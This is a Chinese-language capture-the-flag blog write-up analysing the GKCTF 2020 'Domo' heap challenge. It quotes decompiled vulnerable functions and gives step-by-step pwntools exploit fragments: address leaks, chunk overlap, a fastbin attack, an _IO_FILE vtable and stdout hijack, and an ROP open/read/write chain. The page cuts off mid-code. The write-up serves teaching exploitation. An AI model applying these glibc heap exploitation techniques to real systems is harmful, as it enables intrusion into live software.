<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.8.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>[PWN]GKCTF 2020 Domo分析 - P1ay2win&#39;s blog</title>
<meta name="twitter:card" content="summary_large_image">
<meta property="og:site_name" content="P1ay2win's blog">
<meta property="og:type" content="website">
<meta property="og:title" content="[PWN]GKCTF 2020 Domo分析 | P1ay2win's blog">
<meta property="og:image" content="http://127.0.0.1/2020/05/27/GKCTF 2020 Domo分析//images/pwn!.jpg">
<meta property="twitter:image" content="http://127.0.0.1/2020/05/27/GKCTF 2020 Domo分析//images/pwn!.jpg">






<link rel="alternative" href="/atom.xml" title="[PWN]GKCTF 2020 Domo分析" type="application/atom+xml">



<link rel="icon" href="/images/header.png">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">

</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/header.png" alt="[PWN]GKCTF 2020 Domo分析" height="28">
                P1ay2win&#39;s blog
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>

    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="/images/pwn!.jpg" alt="[PWN]GKCTF 2020 Domo分析">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2020-05-27T13:05:27.000Z">2020-05-27</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/PWN/">PWN</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    22 分钟 读完 (大约 3348 个字)
                </span>
                
                
                    <i class="fa fa-eye"></i> <span id="busuanzi_value_page_pv"></span>次阅读
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                [PWN]GKCTF 2020 Domo分析
            
        </h1>
        <div class="content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p><strong>这道题真心觉得出得不错，一道题学到了很多新的知识。</strong></p>
<p>感谢出题人<a href="http://www.starssgo.top/" target="_blank" rel="noopener">starssgo</a>师傅和<a href="https://nocbtm.github.io/" target="_blank" rel="noopener">nocbtm</a>师傅的思路和writeup，下面就来详细分析一下解题思路和其中用到的解题技巧。</p>
<a id="more"></a>
<h2 id="存在的漏洞"><a href="#存在的漏洞" class="headerlink" title="存在的漏洞"></a>存在的漏洞</h2><ul>
<li><p><strong>off by null</strong></p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">unsigned</span> __<span class="hljs-function">int64 <span class="hljs-title">cmd_add</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">  <span class="hljs-keyword">size_t</span> nbyte; <span class="hljs-comment">// [rsp+0h] [rbp-10h]</span></span><br><span class="line">  <span class="hljs-keyword">unsigned</span> __int64 v2; <span class="hljs-comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="hljs-number">0x28</span>u);</span><br><span class="line">  <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)sub_C16() == <span class="hljs-number">1</span> &amp;&amp; count &lt;= <span class="hljs-number">8</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="hljs-keyword">for</span> ( HIDWORD(nbyte) = <span class="hljs-number">0</span>; SHIDWORD(nbyte) &lt;= <span class="hljs-number">8</span>; ++HIDWORD(nbyte) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="hljs-keyword">if</span> ( !ptr[SHIDWORD(nbyte)] )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"size:"</span>);</span><br><span class="line">        _isoc99_scanf(<span class="hljs-string">"%d"</span>, &amp;nbyte);</span><br><span class="line">        <span class="hljs-keyword">if</span> ( (nbyte &amp; <span class="hljs-number">0x80000000</span>) == <span class="hljs-number">0L</span>L &amp;&amp; (<span class="hljs-keyword">signed</span> <span class="hljs-keyword">int</span>)nbyte &lt;= <span class="hljs-number">288</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          ptr[SHIDWORD(nbyte)] = <span class="hljs-built_in">malloc</span>((<span class="hljs-keyword">signed</span> <span class="hljs-keyword">int</span>)nbyte);</span><br><span class="line">          <span class="hljs-built_in">puts</span>(<span class="hljs-string">"content:"</span>);</span><br><span class="line">          read(<span class="hljs-number">0</span>, ptr[SHIDWORD(nbyte)], (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)nbyte);</span><br><span class="line">          *((_BYTE *)ptr[SHIDWORD(nbyte)] + (<span class="hljs-keyword">signed</span> <span class="hljs-keyword">int</span>)nbyte) = <span class="hljs-number">0</span>;</span><br><span class="line">          ++count;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="hljs-keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">          <span class="hljs-built_in">puts</span>(<span class="hljs-string">"sobig"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v2;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>添加用户这个函数这里，在输入完内容之后，会加个<code>\x00</code>进行截断，然而加<code>\x00</code>的位置是他的size位置，超出了他的空间大小。这样就能修改下一个chunk的<code>szie</code>，实现改<code>pre_inuse</code>和改小下一个chunk的<code>size</code>。</p>
<p>又因为是size位置改成<code>\x00</code>，输入的size稍不注意就会错改了什么东西-_-!，这都是后话。</p>
</li>
<li><p><strong>任意地址写</strong></p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">unsigned</span> __int64 __<span class="hljs-function">fastcall <span class="hljs-title">cmd_edit</span><span class="hljs-params">(_DWORD *a1, _DWORD *a2, _DWORD *a3)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">  _DWORD *v4; <span class="hljs-comment">// [rsp+8h] [rbp-28h]</span></span><br><span class="line">  <span class="hljs-keyword">void</span> *buf; <span class="hljs-comment">// [rsp+20h] [rbp-10h]</span></span><br><span class="line">  <span class="hljs-keyword">unsigned</span> __int64 v6; <span class="hljs-comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = a3;</span><br><span class="line">  v6 = __readfsqword(<span class="hljs-number">0x28</span>u);</span><br><span class="line">  buf = <span class="hljs-number">0L</span>L;</span><br><span class="line">  <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)sub_C16() == <span class="hljs-number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="hljs-keyword">if</span> ( *a1 &amp;&amp; *a2 &amp;&amp; *v4 )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"addr:"</span>);</span><br><span class="line">      _isoc99_scanf(<span class="hljs-string">"%ld"</span>, &amp;buf);</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"num:"</span>);</span><br><span class="line">      read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">1u</span>LL);</span><br><span class="line">      *a1 = <span class="hljs-number">0</span>;</span><br><span class="line">      *a2 = <span class="hljs-number">0</span>;</span><br><span class="line">      *v4 = <span class="hljs-number">0</span>;</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"starssgo need ten girl friend "</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="hljs-keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You no flag"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v6;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里很容易就看出来了，输入任意地址，修改最后一个字节，且只有改一次的机会。</p>
</li>
</ul>
<h2 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h2><p><strong>以下代码块除了exp外，index都是代码块内从0算起的相对index。</strong></p>
<h3 id="0x0-leak-libc-address和heap-address"><a href="#0x0-leak-libc-address和heap-address" class="headerlink" title="0x0 leak libc address和heap address"></a>0x0 leak libc address和heap address</h3><p>对于libc address，要先创一个size大于80，既<code>free</code>后会进入<code>unsorted bin</code>的chunk，再创一个chunk垫底，防止<code>top chunk</code>会跟<code>unsorted bin</code>合并。删除第一个chunk进入<code>unsorted bin</code>，被删除的chunk的<code>fd</code>和<code>bk</code>就会有指向<code>main_arena</code>范围的地址。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">0</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 121132.png" alt></p>
<p>然后再申请与这个<code>unsorted bin</code>chunk同样大小的chunk，内容输入为空，因为我这里用的是<code>sendline</code>，换行符<code>\x0a</code>会覆盖<code>fd</code>的最后一个字节，这里<code>\x00</code>对<code>fd</code>没影响。</p>
<p>用show函数就能输出<code>main_arena</code>的地址，又因为<code>main_arena</code>的地址相对libc地址的偏移是一定的，所以能够计算出libc地址。具体偏移是多少可以用gdb的vmmap命令计算出来。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">main_arena = u64(cmd_show(<span class="hljs-number">0</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) + offset</span><br></pre></td></tr></table></figure>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 125605.png" alt></p>
<p>leak heap address的思路差不多，创两个同样小的chunk，再都<code>free</code>掉进<code>fastbins</code>。第二个<code>free</code>的chunk的<code>fd</code>会指向第一<code>free</code>的chunk，然后一样重新申请一个同样大小的chunk，写入内容空，再输出。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">0</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x10</span>,<span class="hljs-string">''</span>)</span><br><span class="line">main_arena = u64(cmd_show(<span class="hljs-number">0</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)) + offset</span><br></pre></td></tr></table></figure>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 141115.png" alt></p>
<p><strong>这里输入的size要设计得当，不然一不小心就覆盖了后面chunk的size。</strong>特别后面fastbins attack时候不对齐的fake chunk，我在这里踩了不少坑。</p>
<h3 id="0x01-chunk-overlap"><a href="#0x01-chunk-overlap" class="headerlink" title="0x01  chunk overlap"></a>0x01  chunk overlap</h3><p>chunk overlap这部分我申请三个chunk，<strong>输入的size</strong>分别是0x40、0x68和0xf0。第一个chunk放fake chunk，第二个chunk修改fake chunk的<code>next_size</code>，因为第三个chunk的<code>size</code>是0x101，顺便用<strong>off by null</strong>修改第三个chunk的<code>pre_inuse</code>，而第三个chunk的作用纯粹是它的<code>pre_inuse</code>被修改后，根据它的<code>pre_size</code>向前<code>unlink</code>。</p>
<p>还有就是fake chunk那个要伪造下<code>fd</code>和<code>bk</code>指向自己，前面有了head addr，在fake chunk的0x18处放fake chunk的地址，令<code>fake chunk-&gt;fd-&gt;bk=fake chunk</code>且<code>fake chunk-&gt;bk-&gt;fd=fake chunk</code>就OK。</p>
<p>题目的edit函数非常规edit，想修改chunk得free掉再重新申请。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cmd_add(<span class="hljs-number">0x40</span>,flat(<span class="hljs-number">0</span>,<span class="hljs-number">0xb1</span>,heap_addr+<span class="hljs-number">0x18</span>,heap_addr+<span class="hljs-number">0x20</span>,heap_addr+<span class="hljs-number">0x10</span>))</span><br><span class="line">cmd_add(<span class="hljs-number">0x68</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xf0</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x68</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x60</span>,<span class="hljs-number">0xb0</span>))</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br></pre></td></tr></table></figure>
<p>free第三块chunk前堆的情况：</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 145106.png" alt></p>
<p>free第三块chunk后，堆成功重叠：</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 145337.png" alt></p>
<p>这时候就可以控制第二个chunk为所欲为。</p>
<h3 id="0x02-fastbins-attack"><a href="#0x02-fastbins-attack" class="headerlink" title="0x02 fastbins attack"></a>0x02 fastbins attack</h3><p>经过上面的步骤，将堆的情况简单化一下就是还有一个<code>size</code>为0x50的chunk且index为0，一个<code>size</code>为0x70的chunk且index为1和一个大的<code>unsorted bins</code>。</p>
<p>为了好操作一点，先申请一个chunk占着准备用来修改index为1的chunk；然后申请一个<code>size</code>为0x70的chunk，并立即free掉，再free掉<code>szie</code>同为0x70的index为1的chunk；最后，利用占着位的chunk修改第二个free的0x70的chunk，原本指向第一个free的0x70的chunk的<code>fd</code>为想要任意读写的fake chunk的地址。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 2</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 3</span></span><br><span class="line">cmd_del(<span class="hljs-number">3</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk))</span><br></pre></td></tr></table></figure>
<p>此时堆中的情况：</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 154604.png" alt></p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 154708.png" alt></p>
<p>到这里fastbins attack还没完成，由于思路的不同，后面的利用步骤会有所不同。先说说<a href="https://nocbtm.github.io/" target="_blank" rel="noopener">nocbtm</a>师傅的思路。在<code>_IO_2_1_stdin_</code>既stdin文件流结构体的指针里有个<code>vtable</code>变量。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 160648.png" alt></p>
<p><code>vtable</code>变量的值为<code>_IO_file_jumps</code>的指针，<strong><code>_IO_file_jumps</code>中保存了一些函数指针，一系列标准IO函数中会调用这些函数指针</strong>，但<code>_IO_file_jumps</code>里的内容是无法修改的，但可以修改<code>vtable</code>指向伪造的<code>_IO_file_jumps</code>从而getshell。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 161104.png" alt="批注 2020-05-27 161104"></p>
<p>在<code>_IO_2_1_stdin_</code> + 160 - 0x3刚好能作为fake chunk的size，通过fastbins attack到这里修改vtable。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk = _IO_2_1_stdin_ + <span class="hljs-number">160</span> - <span class="hljs-number">0x3</span></span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 2</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 3</span></span><br><span class="line">cmd_del(<span class="hljs-number">3</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk)) <span class="hljs-comment"># overwrite fd</span></span><br><span class="line">cmd_add(<span class="hljs-number">0xa8</span>,p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+p64(one_gadget)*<span class="hljs-number">19</span>) <span class="hljs-comment"># fake vtable</span></span><br><span class="line">fake_vtable = head_addr + offset</span><br><span class="line">payload = <span class="hljs-string">'\x00'</span>*<span class="hljs-number">3</span>+flat(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0xffffffff</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,fake_vtable,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x63</span>,payload)</span><br></pre></td></tr></table></figure>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 162646.png" alt></p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 162803.png" alt></p>
<p>这里通过one_gedget就已经getshell了。</p>
<p>还有<strong>另一种思路</strong>就是出题人的思路，libc的<code>environ</code>里记着stack的地址。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 163914.png" alt="批注 2020-05-27 163914"></p>
<p>用同样是<code>_IO_FILE</code>的<code>_IO_2_1_stdout_</code>，<strong>控制了其中<code>_IO_write_base</code>、<code>_IO_write_ptr</code>和flag，就能任意地址读取</strong>。<code>_IO_write_base</code>为读取的起始地址，<code>_IO_write_ptr</code>为读取的末地址，并且flag的值要得是<strong>0xfbad1800</strong>才能正常读取，至于是为什么，在后面<strong>参考</strong>的最后一条有说，但我是没看懂-_-!。在<code>_IO_2_1_stdout_</code> - 0x43的地方找到个合适的fake chunk的<code>size</code>，其他地方的填充就用原来的值<code>_IO_2_1_stdout_</code> + 131就行。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 170505.png" alt></p>
<p>在修改成功之后再去<code>_IO_2_1_stdout_</code>那看还是没改那样的，但是能接收到输出的，可能是输出完就恢复了。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk = _IO_2_1_stdout_ - <span class="hljs-number">0x43</span></span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 2</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>) <span class="hljs-comment"># index 3</span></span><br><span class="line">cmd_del(<span class="hljs-number">3</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk)) <span class="hljs-comment"># overwrite fd</span></span><br><span class="line">payload = <span class="hljs-string">'\x00'</span>*<span class="hljs-number">3</span>+flat(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-string">'_IO_file_jumps'</span>,<span class="hljs-number">0xfbad1800</span>,_IO_2_1_stdout_+<span class="hljs-number">131</span>,_IO_2_1_stdout_+<span class="hljs-number">131</span>,_IO_2_1_stdout_+<span class="hljs-number">131</span>,libc.sym[<span class="hljs-string">'environ'</span>],libc.sym[<span class="hljs-string">'environ'</span>]+<span class="hljs-number">8</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x63</span>,payload)</span><br><span class="line">stack_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>))</span><br></pre></td></tr></table></figure>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 173109.png" alt></p>
<p>前面从<code>environ</code>读栈地址就是为了改返回地址控制EIP，<code>_IO_2_1_stdin_</code>的任意地址写跟<code>_IO_2_1_stdout_</code>的任意地址读类似，也是需要控制<code>flag</code>还有<code>_IO_buf_base</code>和<code>_IO_buf_end</code>。</p>
<p>这里说下我用非对齐的位置做这次fake chunk的<code>size</code>时会出错，用出题人的方法，任意地址写的函数写一字节作为<code>size</code>的方法却没问题，还有为了payload前加<code>5\n</code>顺便退出程序，写入到<code>_IO_buf_base</code>的<strong>返回地址要-2以接收<code>5\n</code></strong>。这回除了<code>flag</code>、<code>_IO_buf_base</code>和<code>_IO_buf_end</code>外，其余位置用0填充即可。</p>
<p><img src="/2020/05/27/GKCTF 2020 Domo分析/批注 2020-05-27 162646.png" alt></p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk = _IO_2_1_stdin_ - <span class="hljs-number">0x28</span></span><br><span class="line">ret_addr = stack_addr + offset</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">4</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">2</span>)</span><br><span class="line">cmd_del(<span class="hljs-number">1</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0xc0</span>,flat(<span class="hljs-string">'\x00'</span>*<span class="hljs-number">0x38</span>,<span class="hljs-number">0x71</span>,fake_chunk))</span><br><span class="line">cmd_add(<span class="hljs-number">0x40</span>,<span class="hljs-string">'flag\x00'</span>) <span class="hljs-comment"># save orw output</span></span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,<span class="hljs-string">''</span>)</span><br><span class="line">payload = flat(<span class="hljs-number">0</span>,_IO_file_jumps,<span class="hljs-number">0</span>,<span class="hljs-number">0xfbad1800</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,ret_addr<span class="hljs-number">-2</span>,ret_addr+<span class="hljs-number">0x118</span>)</span><br><span class="line">cmd_edit(stdin_hook<span class="hljs-number">-0x20</span>,<span class="hljs-string">'\x7f'</span>)</span><br><span class="line">cmd_add(<span class="hljs-number">0x60</span>,payload)</span><br></pre></td></tr></table></figure>
<p>因为有seccomp的沙箱，改main函数的返回地址为gadget是没法getshell的。禁了些危险的syscall，只能用orw（open,read,write），所以前面content为flag的chunk是要open的文件名，和顺便用来存输出。还有要注意文件名要截断，之前没注意，怪不得一直都读不到flag-_-!。</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">prdi = libc.search(asm(<span class="hljs-string">"pop rdi\nret"</span>)).next()</span><br><span class="line">prsi = libc.search(asm(<span class="hljs-string">"pop rsi\nret"</span>)).next()</span><br><span class="line">prdx = libc.search(asm(<span class="hljs-string">"pop rdx\nret"</span>)).next()</span><br><span class="line">open_addr = libc.sym[<span class="hljs-string">'open'</span>]</span><br><span class="line">read_addr = libc.sym[<span class="hljs-string">'read'</span>]</span><br><span class="line">write_addr = libc.sym[<span class="hljs-string">'write'</span>]</span><br><span class="line">filename_addr = heap_addr + <span class="hljs-number">0x210</span></span><br><span class="line">orw = flat(prdi,filename_addr,prsi,<span class="hljs-number">72</span>,open_addr,prdi,<span class="hljs-number">3</span>,prsi,filename_addr+<span class="hljs-number">0x8</span>,prdx,<span 